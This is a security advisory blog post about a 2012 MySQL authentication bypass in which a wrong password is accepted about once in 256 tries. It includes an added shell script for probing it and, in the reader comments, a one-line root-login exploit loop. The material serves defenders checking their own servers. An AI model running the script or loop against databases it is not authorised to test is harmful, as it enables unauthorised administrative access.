Exploit Available for Trivial MySQL Password Bypass

Published: 2012-06-11
Last Updated: 2012-06-11 13:22:10 UTC
by Johannes Ullrich (Version: 1)
5 comment(s)

Thanks to Jack for pointing this one out to us. I somehow missed this vulnerability this weekend.

Last week MySQL fixed an authentication bypass vulnerability that is trivially exploitable [1]. On an affected build, a login attempt with the wrong password is accepted with a probability of roughly 1/256, so repeating the same wrong password a few hundred times will get you in with high probability. In short: brute forcing passwords always works quickly, and you don't even need to guess the right one.

Whether you are vulnerable depends on how your MySQL binary was compiled: the bypass requires a memcmp() implementation that can return values outside the -128..127 range, and many common builds use one that does not. Chances are you are not vulnerable, but a patch is available and the check is easy: write a script that attempts the same wrong password many times against a valid account and see whether you get logged in after a while.
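
A script for the check just described, as an added example that is not part of the diary or of the MySQL project. It assumes the stock mysql command-line client is installed; the script name and the MYSQL_BIN override (useful for testing the script itself) are my assumptions, not anything from the advisory.

```shell
#!/bin/sh
# Probe a MySQL server for the 1/256 authentication bypass described above.
# Added example, not code from the diary. Assumptions: the stock "mysql" client
# is on PATH (override with MYSQL_BIN when testing the script), and the account
# you name exists and is allowed to connect from this host.

MYSQL_BIN="${MYSQL_BIN:-mysql}"

# probe_mysql_auth HOST USER WRONG_PASSWORD [ATTEMPTS]
# Repeats a login with the same deliberately wrong password. On a vulnerable
# build each attempt is accepted with probability ~1/256, so the default of
# 1000 attempts gets in about 98% of the time (1 - (255/256)^1000). Prints the
# attempt number that succeeded and returns 0 (vulnerable); returns 1 if every
# attempt was refused.
probe_mysql_auth() {
    host=$1
    user=$2
    pass=$3
    attempts=${4:-1000}
    i=1
    while [ "$i" -le "$attempts" ]; do
        # A wrong password normally fails with "Access denied" (non-zero exit);
        # an accepted one runs the harmless SELECT and exits 0.
        if "$MYSQL_BIN" -h "$host" -u "$user" -p"$pass" --connect-timeout=5 \
               -e 'SELECT 1' >/dev/null 2>&1; then
            echo "$i"
            return 0
        fi
        i=$((i + 1))
    done
    return 1
}

# Usage: sh mysql_bypass_probe.sh HOST USER [ATTEMPTS]
# Caveat: a server you cannot reach at all also "refuses" every attempt, so
# confirm connectivity with a known-good password before trusting a clean result.
if [ "$#" -ge 2 ]; then
    if n=$(probe_mysql_auth "$1" "$2" 'not-the-real-password' "${3:-1000}"); then
        echo "VULNERABLE: wrong password accepted on attempt $n"
        exit 2
    else
        echo "all ${3:-1000} attempts refused: not vulnerable, or server unreachable"
    fi
fi
```

This is the same idea as the one-line loop posted in the comments, with a bounded number of attempts and a clear exit status, so it can be run from a cron job or inventory script against every instance you administer. Expect the failed attempts to show up in the server's error log and in any IDS watching port 3306, which is the same signature the scanning mentioned below produces.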

As an additional hardening measure, consider restricting which IP addresses may connect to MySQL at all (via the host part of the account grants, a firewall rule, or both), so that a bypass like this can only be attempted from hosts that have a legitimate reason to talk to the database.

[1] http://seclists.org/oss-sec/2012/q2/493

Johannes B. Ullrich, Ph.D.
SANS Technology Institute

Keywords: mysql


Exploit code is
while true; do mysql -uroot -pasdf mysql; done
using a valid user

but it did not work on my Debian 6 64-bit systems, none of them.
yup. Usually I don't like to link to exploit code, or have exploit code in comments like yours. But in this case, "hiding exploit code" would be silly ;-)

This page describes the problem / exploit pretty well, but basically a LOT of systems should be vulnerable to this, and this gives MySQL admin access - I'd expect to see widespread scanning.



You are not wrong, my IDS is already picking up a larger number of MySQL scans than usual...

It begins.

From vulnerability quote:

Whether a particular build of MySQL or MariaDB is vulnerable, depends on
how and where it was built. A prerequisite is a memcmp() that can return
an arbitrary integer (outside of -128..127 range). To my knowledge gcc
builtin memcmp is safe, BSD libc memcmp is safe. Linux glibc
sse-optimized memcmp is not safe, but gcc usually uses the inlined
builtin version.

Doesn't work on any of the 6 MySQL servers I administer (Debian, Ubuntu Server, CentOS).
